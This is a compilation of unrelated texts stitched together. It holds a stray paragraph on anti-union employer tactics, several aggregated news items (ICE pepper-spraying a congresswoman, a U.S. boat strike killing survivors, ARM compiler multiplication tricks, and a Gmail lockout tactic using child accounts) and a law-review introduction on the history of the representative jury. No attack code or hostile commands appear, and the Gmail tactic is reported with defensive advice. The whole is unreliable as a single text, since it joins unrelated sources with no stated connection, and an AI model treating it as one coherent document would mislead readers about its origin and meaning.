WHAT THE EARLY 1980S INAUGURATED GREW APACE over the subsequent 40 years. Emboldened by Reagan’s opposition to unions, CEOs and corporate boards routinely directed their companies to violate the laws that had empowered workers to form and join unions. In 2016 and 2017, employers were charged with violating the National Labor Relations Act in 41.5 percent of all unionization campaigns, often by firing workers involved in those campaigns. The penalties for being found guilty of such charges are negligible, and Democrats’ efforts to amend the NLRA so that the penalties actually have some effect on employer conduct have never been able to win the support of the 60 senators required to break a filibuster to enact such amendments. So it is that most unionized private companies were unionized many decades ago, and almost all the major companies that have been created since (including the two largest private-sector employers, Walmart and Amazon) have rebuffed their employees’ unionization efforts through illegal threats and firings.

ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video

Intercept
theintercept.com
2025-12-06 00:19:09
Heavily armed tactical teams fired crowd suppression munitions at the Arizona lawmaker and protesters, claiming she was leading “a mob.” The post ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video appeared first on The Intercept....
Original Article

Federal immigration agents pepper-sprayed and shot crowd suppression munitions at newly sworn-in Arizona Rep. Adelita Grijalva during a confrontation with protesters in Tucson on Friday.

A video Grijalva posted online shows an agent in green fatigues indiscriminately dousing a line of several people — Grijalva included — with pepper spray outside a popular taco restaurant.

“You guys need to calm down and get out,” Grijalva says, coughing amid a cloud of spray. In another clip, an agent fires a pepper ball at Grijalva’s feet.

In a statement, Department of Homeland Security assistant secretary Tricia McLaughlin denied that Grijalva was pepper-sprayed, saying that if her claims were true, “this would be a medical marvel. But they’re not true. She wasn’t pepper sprayed.”

“She was in the vicinity of someone who *was* pepper sprayed as they were obstructing and assaulting law enforcement,” McLaughlin continued. The comment suggested a lack of understanding as to how pepper spray works. Fired from a distance, pepper-spray canisters create a choking cloud that will affect anyone in the vicinity, as Grijalva’s video showed.

In a separate video Grijalva posted to Facebook, the Democratic representative from Southern Arizona described community members confronting approximately 40 Immigration and Customs Enforcement agents in several vehicles.

“I was here, this is like the restaurant I come to literally once a week,” she said, “and was sprayed in the face by a very aggressive agent, pushed around by others.” Grijalva maintained that she was not being aggressive. “I was asking for clarification,” she said. “Which is my right as a member of Congress.”

Video from journalists on the ground shows dozens of heavily armed agents — members of ICE’s high-powered Homeland Security Investigations wing and the Department of Homeland Security’s SWAT-style Special Response teams — deploying flash-bang grenades, tear gas, and pepper-ball rounds at a crowd of immigrant rights protesters near Taco Giro, a popular mom-and-pop restaurant in west Tucson.

According to McLaughlin, two “law enforcement officers were seriously injured by this mob that Rep. Adelita Grijalva joined.” She provided no evidence or details for the claim.

“Presenting one’s self as a ‘Member of Congress’ doesn’t give you the right to obstruct law enforcement,” McLaughlin wrote. The DHS press secretary did not respond to a question about the munitions fired at Grijalva’s feet.

Grijalva “was doing her job, standing up for her community,” Sen. Ruben Gallego, D-Ariz., said in a social media post Friday. “Pepper-spraying a sitting member of Congress is disgraceful, unacceptable, and absolutely not what we voted for. Period.”

Additional footage from Friday’s scene shows Grijalva and members of the media face-to-face with several heavily armed, uniformed Homeland Security Investigations agents as they loaded at least two people — both with their hands zip-tied behind their backs — into a large gray van.

Grijalva identifies herself as a member of Congress and asks where they are being taken. One of the masked agents initially replies, “I can’t verify that.” Another pushes the congresswoman and others back with his forearm. “Don’t push me,” Grijalva says multiple times. A third masked agent steps in front of the Arizona lawmaker, makes a comment about “assaulting a federal officer,” and then says the people taken into custody would be transferred to “federal jail.”

“We saw people directly sprayed, members of our press, everybody that was with me, my staff member, myself,” Grijalva said in her video report from Friday’s chaotic scene. She described the events as the latest example of a Trump administration that is flagrantly flouting the rule of law, due process, and the Constitution.

“They’re literally disappearing people from the streets,” she said. “I can just only imagine how if they’re going to treat me like that, how they’re treating other people.”

The violence Grijalva experienced Friday marked the latest chapter in what has been a dramatic year for Arizona’s first Latina representative.

Grijalva won a special election in Arizona’s 7th Congressional District earlier this year to replace her father, Raúl Grijalva, a towering progressive figure in the state who represented Tucson for more than 20 years before passing away in March.

Republican Speaker of the House Mike Johnson delayed the younger Grijalva’s swearing-in for nearly two months amid the longest government shutdown in history. Grijalva provided the deciding signature on a discharge petition to release files related to convicted sex trafficker Jeffrey Epstein, signing it immediately after taking office.

Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them

Intercept
theintercept.com
2025-12-06 00:07:45
“There are a lot of disturbing aspects. But this is one of the most disturbing.” The post Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them appeared first on The Intercept....
Original Article

Two survivors clung to the wreckage of a vessel attacked by the U.S. military on September 2 for roughly 45 minutes before a second strike killed them. After about three quarters of an hour, Adm. Frank Bradley, then head of Joint Special Operations Command, ordered the follow-up strike — first reported by The Intercept in September — that killed the shipwrecked men, according to three government sources and a senior lawmaker.

Two more missiles followed, finally sinking the foundering vessel. Bradley, now the chief of Special Operations Command, claimed that he conducted multiple strikes because the shipwrecked men and the fragment of the boat still posed a threat, according to the sources.

Secretary of War Pete Hegseth distanced himself from the follow-up strike during a Cabinet meeting at the White House, telling reporters he “didn’t personally see survivors” amid the fire and smoke and had left the room before the second attack was ordered. He evoked the “fog of war” to justify the decision for more strikes on the sinking ship and survivors.

Rep. Adam Smith, D-Wash., the ranking member of the House Armed Services Committee, said Hegseth provided misleading information and that the video shared with lawmakers Thursday showed the reality in stark light.

“We had video for 48 minutes of two guys hanging off the side of a boat. There was plenty of time to make a clear and sober analysis,” Smith told CNN on Thursday. “You had two shipwrecked people on the top of the tiny little bit of the boat that was left that was capsized. They weren’t signaling to anybody. And the idea that these two were going to be able to return to the fight — even if you accept all of the questionable legal premises around this mission, around these strikes — it’s still very hard to imagine how these two were returning to any sort of fight in that condition.”

Three other sources familiar with briefings by Bradley provided to members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees on Thursday confirmed that roughly 45 minutes elapsed between the first and second strikes. “They had at least 35 minutes of clear visual on these guys after the smoke of the first strike cleared. There were no time constraints. There was no pressure. They were in the middle of the ocean and there were no other vessels in the area,” said one of the sources. “There are a lot of disturbing aspects. But this is one of the most disturbing. We could not understand the logic behind it.”

The three sources said that after the first strike by U.S. forces, the two men climbed aboard a small portion of the capsized boat. At some point the men began waving to something overhead, which three people familiar with the briefing said logically must have been U.S. aircraft flying above them. All three interpreted the actions of the men as signaling for help, rescue, or surrender.

“They were seen waving their arms towards the sky,” said one of the sources. “One can only assume that they saw the aircraft. Obviously, we don’t know what they were saying or thinking, but any reasonable person would assume that they saw the aircraft and were signaling either: don’t shoot or help us. But that’s not how Bradley saw it.”

Special Operations Command did not reply to questions from The Intercept prior to publication.

During the Thursday briefings, Bradley claimed that he believed there was cocaine in the quarter of the boat that remained afloat, according to the sources. He said the survivors could have drifted to land or to a rendezvous point with another vessel, meaning that the alleged drug traffickers still had the ability to transport a deadly weapon — cocaine — into the United States, according to one source. Bradley also claimed that without a follow-up attack, the men might rejoin “the fight,” another source said.

Sen. Tom Cotton, R-Ark., echoed that premise, telling reporters after the briefings that the additional strikes on the vessel were warranted because the shipwrecked men were “trying to flip a boat, loaded with drugs bound for the United States, back over so they could stay in the fight.”

None of the three sources who spoke to The Intercept said there was any evidence of this. “They weren’t radioing anybody and they certainly did not try to flip the boat. [Cotton’s] comments are untethered from reality,” said one of the sources.

Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, said that the people in the boat weren’t in any fight to begin with. “They didn’t pose an imminent threat to U.S. forces or the lives of others. There was no lawful justification to kill them in the first place let alone the second strike,” she told The Intercept. “The only allegation was that the men were transporting drugs, a crime that doesn’t even carry the death penalty.”

The Justice Department’s Office of Legal Counsel this summer produced a classified opinion intended to shield service members up and down the chain of command from prosecution. The legal theory advanced in the finding claims that narcotics on the boats are lawful military targets because their cargo generates revenue, which can be used to buy weaponry, for cartels that the Trump administration claims are in armed conflict with the U.S.

The Trump administration claims that at least 24 designated terrorist organizations are engaged in “non-international armed conflict” with the United States including the Venezuelan gang Tren de Aragua; Ejército de Liberación Nacional, a Colombian guerrilla insurgency; Cártel de los Soles, a Venezuelan criminal group that the U.S. claims is “headed by Nicolas Maduro and other high-ranking Venezuelan individuals”; and several groups affiliated with the Sinaloa Cartel.

The military has carried out 22 known attacks, destroying 23 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 87 civilians. The most recent attack occurred in the Pacific Ocean on Thursday and killed four people.

Since the attacks began, experts in the laws of war and members of Congress, from both parties, have said the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.

Taavi Väänänen: How to import a new Wikipedia language edition (in hard mode)

PlanetDebian
taavi.wtf
2025-12-06 00:00:00
I created the latest Wikipedia language edition, the Toki Pona Wikipedia, last month. Unlike most other wikis which start their lives in the Wikimedia Incubator before the full wiki is created, in this case the community had been using a completely external MediaWiki site to build the wiki before it was...

ARM's barrel shifter tricks

Lobsters
xania.org
2025-12-05 23:51:21
Comments...
Original Article

Written by me, proof-read by an LLM.
Details at end.

Yesterday we talked about how the compiler handles multiplication with a constant on x86. x86 has some architectural quirks (like lea) that give the compiler quite some latitude for clever optimisations. But do other processors have similar fun quirks?

Today we’re going to look at what code gets generated for the ARM processor. Let’s see how our examples come out:

Here we see ARM’s orthogonal and sensible instruction set, along with its superpower: the barrel shifter. On ARM, many instructions can include a shift of the second operand. While not always completely “free” on modern processors, it’s cheap enough that the compiler can use it to avoid separate shift instructions.

Multiplying by 2 is just a shift:

mul_by_2(int):
  lsl w0, w0, #1    ; w0 = w0 << 1
  ret

Multiplying by 3 is an add of w0 plus itself shifted left by 1, as a single instruction:

mul_by_3(int):
  add w0, w0, w0, lsl #1  ; w0 = w0 + (w0 << 1)
  ret

Multiplying by 4 or 16 is also a simple shift, but there’s no shortcut for multiplying by 25 or 522: the compiler has to generate a multiply instruction there.
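The by-4 case, for instance, comes out as a single two-bit shift. Here’s a sketch of the likely output, mirroring the mul_by_2 example above (my reconstruction, not output copied from the original post):

mul_by_4(int):
  lsl w0, w0, #2    ; w0 = w0 << 2
  ret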

It’s also interesting that the operands can’t be constant values, except for mov; so the constants 25 or 522 have to be loaded into a register before they can be used in the multiply. ARM has a fixed-size instruction format: every instruction is 4 bytes long, so there’s limited space to pack all the operands in.
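Putting that together, the by-25 case plausibly looks something like the following. This is a hand-written sketch of typical compiler output, so the exact register choices may differ:

mul_by_25(int):
  mov w1, #25       ; the constant must be loaded into a register first
  mul w0, w0, w1    ; w0 = w0 * 25
  ret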

On older 32-bit ARM there’s an even cooler trick to let us multiply by one-less-than-a-power-of-two, using rsb (reverse subtract, dest = op2 - op1). If we pick 32-bit armv7 we get to see this in action:

mul_by_7(int):
  rsb r0, r0, r0, lsl #3    ; r0 = (r0 << 3) - r0
  bx lr

Here a single instruction calculates result = (8 * x) - x. Cool stuff, but only on 32-bit ARMs. I guess that’s the price of progress?

Different architectures, different tricks: x86 has lea , ARM has the barrel shifter. The compiler knows them all, so we don’t have to.

See the video that accompanies this post.


This post is day 5 of Advent of Compiler Optimisations 2025, a 25-day series exploring how compilers transform our code.

This post was written by a human (Matt Godbolt) and reviewed and proof-read by LLMs and humans.

Support Compiler Explorer on Patreon or GitHub, or by buying CE products in the Compiler Explorer Shop.

Posted at 06:00:00 CST on 5th December 2025.

Dithering: ‘Alan Dye Leaves Apple’

Daring Fireball
dithering.passport.online
2025-12-05 23:25:09
Dithering is my and Ben Thompson’s twice-a-week podcast — 15 minutes per episode, not a minute less, not a minute more. It’s a $7/month or $70/year subscription, and included in the Stratechery Plus bundle (a bargain). This year our CMS (Passport — check it out) gained a feature that lets us ma...

Google 'Looking into' Gmail Hack Locking Users Out with No Recovery

Hacker News
www.forbes.com
2025-12-05 23:18:56
Comments...
Original Article
[Image: Gmail logo on a smartphone. Credit: SOPA Images/LightRocket via Getty Images]

This devastating Gmail attack locks users out of their accounts with no comeback.

I write a lot about Google security, and in particular about Gmail, the most popular free email platform on the planet with 2 billion active users. Sure, much of this focuses on the latest vulnerability alerts and threat campaigns, as well as the occasional compromised-passwords warning, and I will always include advice on how to mitigate the risk of any attack, much of which comes from Google itself. But when I hear from readers that they are being locked out of their Gmail accounts by hackers and are unable to get back in, no matter what, that’s a concern. When Google informs me that it is “looking into it” and will issue specific guidance “in the near future,” that’s even more so. Here’s what you need to know about the Gmail hack attack that prevents you from regaining access to your account, and how best to protect yourself from becoming yet another victim.

Hackers Lock Down Compromised Gmail Accounts Using Parent And Child Protections

As regular readers will likely already know, I entered the world of cybersecurity as a hacker in the 1980s. Hacking is not a crime, quite literally so back then, as there were no laws that specifically applied to the act of unauthorised network intrusion. Criminal hacking is quite another thing altogether. So, when I read about a Gmail user who had not only been compromised but found themselves locked out of their account with seemingly no chance of recovery, my hacker brain started to engage. How could this be, I wondered, given that there are so many ways to get account control back, even if an attacker has changed your password post-compromise. And then the chicken clucked, the bell rang, and the penny dropped: this was a very clever bit of hackery involving the use of a feature meant to protect accounts, not hold them hostage.

A Google user posted a plea for help to the Gmail subreddit explaining how an attacker had changed his age to 10 on his account profile and then added the account to a family group under the attacker’s control. Ten years old is younger than the account has even existed (it is apparently 12 years old), which you would have hoped might set off some Google alarm bells in these days of advanced AI protections, but no. By adding the compromised account to a family account and making it a child one, the attacker left the actual owner totally locked out and unable to use any of the myriad recovery options provided by Google. The icing on this particularly smelly cake was that the attacker then demanded the victim send a bunch of gift cards to get the account released. “TL;DR: Account accessed, placed as a child in a Google family, and locked out,” the victim concluded, “please help.”

As the thread developed, others confirmed that the use of a child account is becoming a common tactic among hackers, and recovering from it appears impossible. “You would think that changing people’s date of birth on their accounts should require a forced re-auth and not be doable without providing all authentication factors,” one wrote, quite sensibly.

Google Is Looking Into Gmail Account Post-Compromise Threat

Perhaps the most astute comment in the subreddit thread came from someone suggesting that Google had probably not anticipated such a situation. This does seem likely, although it’s a very unfortunate error if so. I reached out to Google to ask for advice for the victims of this lockout attack, and a spokesperson told me that the security team was looking into it as “a known post-compromise action some hijackers take.” Google stressed, however, that it is also a fairly uncommon one. I suspect, now that the tactic is becoming known in online forums, that more attackers will deploy it. “Look for more detail and specific guidance from us on this in the near future,” the Google spokesperson said, sharing the following core guidance for stopping account takeovers in the meantime:

  • Turn on two-step verification and adopt passkeys.
  • Double-check that only current/available phones or numbers are associated with accounts, and regularly review what devices are associated with them.
  • Set up recovery information, like a recovery email or phone number, or use the recently announced recovery contacts feature.

Remember, the best way to prevent an attacker from locking you out of your Gmail account in this way is to prevent them from compromising it in the first place. You know it makes sense, so get that Google passkey set up now.

Apple’s Succession Intrigue Isn’t Strange at All

Daring Fireball
www.theinformation.com
2025-12-05 23:08:12
Aaron Tilley and Wayne Ma, in a piece headlined “Why Silicon Valley is Buzzing About Apple CEO Succession” at the paywalled-up-the-wazoo The Information: Prediction site Polymarket places Ternus’ odds of getting the job at nearly 55%, ahead of other current Apple executives such as software head...

Lisa Jackson on The Talk Show Back in 2017

Daring Fireball
daringfireball.net
2025-12-05 22:37:35
This interview was both interesting and a lot of fun. Worth a listen or re-listen.  ★  ...
Original Article

The Talk Show

Apple VP Lisa Jackson

Friday, 21 April 2017

Special guest Lisa Jackson — Apple’s vice president of Environment, Policy, and Social Initiatives — joins the show for an Earth Day discussion of the state of Apple’s environmental efforts: climate change, renewable energy, responsible packaging, and Apple’s new goal to create a “closed-loop supply chain”, wherein the company’s products would be manufactured entirely from recycled materials.

Full transcript of this episode.

Download MP3.

Sponsored exclusively by:

  • Circle With Disney : Disney’s new way for families to manage content and time across devices. Use code THETALKSHOW to get free shipping and $10 off.

This episode of The Talk Show was edited by Caleb Sexton.

The Radical Roots of the Representative Jury

Portside
portside.org
2025-12-05 22:32:30
The Radical Roots of the Representative Jury barry Fri, 12/05/2025 - 17:32 ...
Original Article

abstract. For most of American history, the jury was considered an elite institution, composed of “honest and intelligent men,” esteemed in their communities for their “integrity,” “reputation,” or “sound judgment.” As a result, jurors were overwhelmingly male, jurors were overwhelmingly white, and jurors disproportionately hailed from the middle and upper social classes. By the late 1960s, an entirely different, democratic conception of the jury was ascendant: juries were meant to pull from all segments of society, more or less randomly, thus constituting a diverse and representative “cross-section of the community.” This Article offers an intellectual and social history of how the “elite jury” lost its hegemonic appeal, with particular emphasis on the overlooked radicals—anarchists, socialists, Communists, trade unionists, and Popular Front feminists—who battled to remake the jury. This Article offers a novel look at the history and tradition of the American jury, demonstrating how the Sixth Amendment’s meaning was—gradually, unevenly, but definitively—reshaped through several decades of popular struggle, grassroots mobilization, strategic litigation, and social-movement contestation.

author. Professor of Law, University of Virginia School of Law. This project profited greatly from feedback received at faculty workshops at George Washington, Cornell, and Cardozo law schools; the Neighborhood Criminal Law Conference, the Vanderbilt Criminal Justice Roundtable, and the UChicago Constitutional Law Conference; and in the Juries, Race, and Citizenship seminar at Duke Law School. I am particularly indebted to Emily Coward, Daniel Epps, Brandon L. Garrett, Valerie Hans, David Huyssen, Joseph E. Kennedy, Nancy J. King, Anna Lvovsky, Kelly Orians, Mary Reynolds, Jocelyn Simonson, and Brad Snyder. Cyrus Khandalavala and the editors of the Yale Law Journal deserve a special acknowledgment for their diligent work strengthening and sharpening the final product. All errors are mine.


Introduction

In 1975, when the U.S. Supreme Court first held that the Sixth Amendment right to a jury trial necessarily contemplates a jury drawn from a “fair cross section of the community,” the outcome seemed like a “foregone conclusion.” 1 Congress had already declared in 1968 that federal defendants had a statutory right “to grand and petit juries selected at random from a fair cross section of the community,” 2 and the Court was gradually recognizing that “the essential feature of a jury obviously lies . . . in . . . community participation and shared responsibility,” which (“probably”) meant juries large enough to serve as “representative cross-section of the community.” 3 Notably, as it took shape, the Supreme Court’s fair-cross-section doctrine eschewed any focus on discriminatory intent: a jury drawn from an unrepresentative pool generally cannot be “impartial” within the meaning of the Sixth Amendment, regardless of whether the disparities are attributable to a clerk’s discriminatory animus or an accidental computer glitch. 4 True, the Supreme Court has never required any particular petit jury to be perfectly, or even roughly, “representative” of the local community. The Court has repeatedly rejected the suggestion that a defendant might have the right to be judged by jurors sharing some particular identity or trait. 5 But the ideal of the jury that constitutes a fair cross-section of the community—or, what I will generally refer to as the “representative jury” throughout this Article—has triumphed. 6 When a high-profile jury trial occurs, we are accustomed to asking whether the petit jury is representative of the community from which it is drawn. 7 Americans expect, and want, juries to mirror the demographics of the community—if not in every case, at least in the aggregate. 8

But this conception of the jury, now common sense, is new. In 1925, only a handful of radicals would have recognized it. 9 Indeed, for most of American history, juries were not “cross-sections” of the community, nor were they legally required to be “representative” in any meaningful sense. Most jurisdictions limited jury service to “honest and intelligent men . . . esteemed in the community for their integrity, good character and sound judgment.” 10 Judges, jury commissioners, and “key men” tasked with identifying suitable jurors populated their lists with upstanding citizens who, in their minds, satisfied these subjective statutory requirements and were “above average” in every regard. The predictable result: jurors were men, jurors were white, and jurors disproportionately hailed from the middle and upper social classes. 11 As Judge Learned Hand wrote in 1950, defendants could repeat the phrase “cross-section” ad nauseam, but it was “idle to talk of the justness of a sample, until one knows what is the composition of the group which it is to represent.” 12 Historically, jurors were citizens possessing “intelligence, character and general information,” so if a method of summoning jurors “resulted in weighting the list with the wealthy” (a disproportionate number of whom supposedly boasted such qualities), surely it could not be unlawful. 13 More recently, Justice Thomas has made a related point: the constitutional requirement that juries be drawn from a representative cross-section of the community “seems difficult to square with the Sixth Amendment’s text and history.” 14 The representative jury is not the inheritance of some unbroken tradition, but rather a deliberate, relatively recent departure from it.

To be sure, the democratic promise of a jury as a body of one’s “peers” dates to the Magna Carta. “[J]urors and voters were conceptualized as complementary legislators” at the Founding, 15 with the jury box giving “the common people [as jurors]” a mechanism to wield control in the judiciary. 16 Throughout the nineteenth century, criminal defendants, often racial minorities and women, protested that unrepresentative juries denied them their basic constitutional rights. 17 But the “elite jury” still reigned. 18 In American law and culture, little incongruity existed between the idea of a “jury of one’s peers” (or the “impartial” jury guaranteed by the Sixth Amendment) and the dominant practice of elite juries. 19 And democratizing the jury box by taking affirmative steps to include those who lacked the superior qualities expected of jurors struck many as nonsensical. 20 So, what changed? How did our popular, common-sense understanding of the jury shift so dramatically over such a short period of time?

There are standard ways of answering these questions. The most superficial might stress the relatively late dates of landmark Supreme Court cases democratizing the jury— Taylor v. Louisiana in 1975 and Batson v. Kentucky in 1986, for example—and view these opinions exclusively as downstream (and belated) fruits of “the civil rights movement of the 1960s ca[tching] up with the jury.” 21 On this view, the law of the jury is something of a backwater, with the most important civil-rights developments occurring in the realms of public education, voting, employment, or public accommodations. A more nuanced, though still top-down, doctrinal account might locate the seeds of the Supreme Court’s mature “fair-cross-section” jurisprudence in cases decided somewhat earlier. 22 In 1940, for example, responding to an egregious record of racial exclusion of Black jurors in Harris County, Texas, Justice Black asserted for the majority, without citation, that “[i]t is part of the established tradition in the use of juries as instruments of public justice that the jury be a body truly representative of the community.” 23 In subsequent cases, dicta endorsing “the concept of the jury as a cross-section of the community” began appearing in Supreme Court opinions. 24 On occasion, the Court used its supervisory power to vacate federal criminal convictions where incontrovertible evidence established that wage earners 25 or women 26 had been improperly excluded from jury service as a class. After the Warren Court incorporated the right to trial by jury against the states in 1968, 27 it was only a matter of time before dicta from these earlier cases—and the inchoate democratic principles they articulated—crept into constitutional criminal procedure.

Looking beyond the Supreme Court, however, offers a far richer answer. From such a perspective, this Article argues that the “elite jury” lost its hegemonic appeal in significant part due to a forgotten struggle to democratize the American jury—beginning decades before what is classically viewed as the heyday of the Civil Rights Movement. 28 The protagonists of this story include not only litigators affiliated with well-known organizations like the NAACP and the ACLU, but also left-wing radicals—anarchists, Communists, socialists, trade unionists, and Popular Front feminists—who recognized the jury box as an important battleground in overthrowing capitalism, dismantling white supremacy, and expanding the horizons of twentieth-century American democracy. Their battle to remake the jury was waged not only in the courtroom but also through confrontational “mass defense” campaigns in the streets, often at substantial personal risk. Lawyers who raised jury-discrimination claims risked lynching and professional ruin; protestors supporting their efforts were sometimes met with police truncheons and tear gas. 29 In the short term, their combined efforts achieved mixed results in individual cases—but they were effective in exposing the yawning gap between America’s rhetoric of equal citizenship and the criminal-legal system’s inegalitarian reality. In the long run, they played a critical role in transforming a core American institution.

This Article’s basic aim, then, is to recover the role of nonelite, nonstate actors—radical lawyers, civil-rights organizers, labor activists, and excluded juror-citizens themselves—in enduring forms of lawmaking. The central contribution of this Article is not simply that the Supreme Court’s fair-cross-section jurisprudence reflects the ideological contribution of socialists or Communists, actors often regarded as external or even hostile to American democracy. 30 Nor does this Article contend that radical activists were the representative jury’s sole architects; the fair-cross-section requirement was propelled by a broad array of social, political, and legal developments alongside those this Article foregrounds. 31 Instead, this Article demonstrates that these radical litigants and the masses they mobilized—and, in particular, their engagements with the legal institutions they viewed with profound skepticism—comprise a missing and indispensable vantage point from which to understand the doctrine’s development. Following Lani Guinier and Gerald Torres, this Article’s genealogy of the fair-cross-section doctrine is offered as a “demosprudential” case study in how popular participation and collective action—not just courts or legislatures—influenced cultural understandings of the jury, the development of legal norms, and, eventually, constitutional law. 32 Put slightly differently, while radical lawyers and high-profile criminal cases play an important role in this story, this Article is fundamentally concerned with how the Sixth Amendment’s meaning was—gradually, unevenly, but definitively—reshaped through several decades of popular struggle, grassroots mobilization, strategic litigation, and social-movement contestation.

This Article proceeds in five parts. Part I is a prelude of sorts, briefly introducing the American jury circa 1925. It surveys the state of the law, the composition of juries in the real world, and the increasingly contested social understandings of what the jury ought to be. During the 1920s, the embattled American labor movement modeled an alternative vision of the jury: in high-profile trials, unions would deploy racially diverse “labor juries” to monitor proceedings from the audience, eventually deliberating and rendering their own verdicts (which often conflicted with those returned by the bourgeois juries of the courts). 33 The post-World War I crackdown on Communists, anarchists, and other labor radicals, Part I argues, helped crystallize the importance of public “mass defense” campaigns and heightened the salience of jury-selection practices to those struggling to transform American society. Toward the decade’s end, as Communists came to recognize that white Southerners were “us[ing] the criminal justice system to enforce their political economy,” 34 the jury box became a central battleground for larger fights over citizenship, white supremacy, and economic inequality.

Part II focuses on the work of the International Labor Defense (ILD), a Communist-backed “mass defense” organization that emerged from the labor battles surveyed in Part I. While the ILD’s efforts on behalf of the Scottsboro Boys in Alabama are well known, 35 its other major cases from the era have been overlooked, and the organization’s critical role in repeatedly pressing jury-discrimination claims, including in the Scottsboro case itself, has received no scrutiny whatsoever. Across the country, from Maryland 36 to Georgia, 37 the ILD established itself as the country’s most militant champion of Black citizens’ rights in the early 1930s, in significant part by scoring key legal victories against the all-white jury. 38 Apart from demonstrating that such legal claims could be successfully brought, even in the Deep South, the Communists’ daring assaults on the all-white jury—and their inflammatory denunciations of their rivals—prodded more established groups like the NAACP to begin raising similar challenges, too. 39 But in the early years, it was the ILD that forced open a space for jury-discrimination claims in both the courts and the country’s political imagination—often through confrontational “mass defense” tactics that the NAACP eschewed.

Part III turns to the prosecution and ultimate execution of Odell Waller, a Black sharecropper who shot and killed his white landlord in 1940. There are no historical markers commemorating Waller’s case in the town of Gretna, Virginia, today, but at the time, Waller was a household name across America. On the eve of his execution in 1942, Harlem went dark as residents turned out their lights in protest, and twenty thousand supporters rallied to save his life inside Madison Square Garden. 40 Behind the scenes, Eleanor Roosevelt was lobbying Justice Frankfurter on Waller’s behalf, and President Franklin D. Roosevelt secretly appealed to Virginia’s governor to spare his life. 41 In many ways, the campaign to save Waller resembled the ILD’s efforts described in Part II: Waller was originally defended by a tiny Trotskyite group and later by the more mainstream socialists of the Workers Defense League (WDL); organizers embraced a “mass defense” strategy, litigating their cause both in court and in the streets; and the appeals in the capital case turned on a jury-discrimination claim. But whereas the ILD’s campaigns in the 1930s focused exclusively on race, Odell Waller’s appeals challenged Virginia’s use of “poll-tax juries,” which excluded both Black and poor white citizens. The unprecedented use of the Equal Protection Clause to attack wealth-based legal discrimination thus advanced a more capacious understanding of what it meant for a jury to reflect a “fair cross-section of the community.” And it put a national spotlight on Virginia’s longstanding practice of limiting the political rights of the poor, raising uncomfortable questions about the United States’s commitment to democracy at home as the country geared up to fight totalitarianism abroad. 42

On the other side of World War II, jury-selection practices once again played a central role in the country’s highest-profile trial: the 1948-1949 conspiracy prosecution of the leaders of the Communist Party USA (CPUSA). Part IV revisits the Foley Square Trial, today best remembered as a landmark free-speech case in which the Supreme Court upheld the Smith Act against a First Amendment challenge. 43 But for its first eight weeks, the prosecution was derailed by the most comprehensive challenge to jury-selection practices ever seen in an American courtroom, going far beyond the type of discrimination claims at issue in Parts II and III. The Communists alleged that the ad hoc method of summoning jurors in the Southern District of New York (SDNY) resulted in the unconstitutional underrepresentation of the “poor” and “propertyless”; manual workers; residents of “low rent” neighborhoods; “Negroes and other racial and national minorities”; women; Communists; and a variety of other groups. 44 In effect, the Communists asserted a constitutional right to a jury that was a true cross-section of New York, and they compiled droves of evidence demonstrating how SDNY’s juries fell short of this ideal. Once again, the proponents of the representative jury lost the immediate battle. The Communists’ “attack on the jury system,” however, gave pause to even the most anti-Communist liberals and effectively prefigured the model of random jury selection that would become federal law within two decades’ time. 45

Part V concludes by returning to Alabama, thirty years after the Scottsboro Boys’ convictions were vacated on jury-discrimination grounds, to reexamine another landmark case in the ascendance of the representative jury: White v. Crook. 46 While the campaigns and litigation examined in Parts II through IV had done a great deal to democratize the jury box, women were still regularly excluded from the “cross-section of the community” that juries were meant to reflect. Gardenia White, a Black female activist in “Bloody” Lowndes County, Alabama, served as lead plaintiff in a 1965 class-action lawsuit that aimed to change that. The litigation was pathbreaking in multiple regards: (1) the lawsuit was the first time that prospective jurors themselves, as opposed to defendants, had sued to vindicate their own rights as jurors, and (2) the plaintiffs advanced the novel argument that the Equal Protection Clause barred discrimination based on race and sex. 47 The animating theory—that sex-based discrimination and race-based discrimination were not only analogous, but interrelated forms of subordination 48 —echoed arguments unsuccessfully advanced by Odell Waller twenty-five years earlier, and for good reason. The Alabama litigation was the brainchild of a queer Black lawyer, Pauli Murray, whose decision to enroll at Howard Law School was prompted by her work as the WDL’s lead field organizer on the Waller campaign. 49 In early 1966, a three-judge panel sided with Murray and White; it was the first time a federal court had held that sex-based discrimination violated the Equal Protection Clause.

Linking these cases and campaigns, in addition to a recurring cast of key figures, is the enduring influence of a particular form of grassroots American radical politics—sometimes labeled Popular Frontism—that emerged as a mass social movement in the 1930s. 50 More than an ephemeral liberal-left political alliance against European fascism, 51 the Popular Front took shape as “a radical social-democratic movement forged around anti-fascism, anti-lynching, and . . . industrial unionism.” 52 It emerged in nascent forms in the United States before Moscow abandoned the ultrasectarian posturing of the Soviet Union’s Third Period in the early 1930s, 53 and it endured long after the Popular Front nominally ended by 1940. 54 For the people who shaped and were shaped by its culture, the Popular Front promoted

support for a multiracial American national identity [cast by] people of color, immigrants and radicals . . . insistence that political and labor movements be grassroots and rank-and-file led . . . and adherence to a revolutionary politics based in multiracial and cross-class campaigns for race, gender, and economic justice, simultaneously. 55

And, in many ways, the campaigns and political program of the ILD (discussed in Part II) served not only as “the heart of the political and artistic energies of the proletarian avant-garde” of the 1930s, 56 but also provided strategies and an ethos that reverberated in legal fights over the subsequent decades. 57 It should come as no surprise, then, that the figures who emerged later in this history had formative political experiences in the jury struggles that preceded them. The roots of the representative jury are found in the democratic and egalitarian soil of this political milieu, which shaped the worldview and lives of so many of this Article’s protagonists. 58

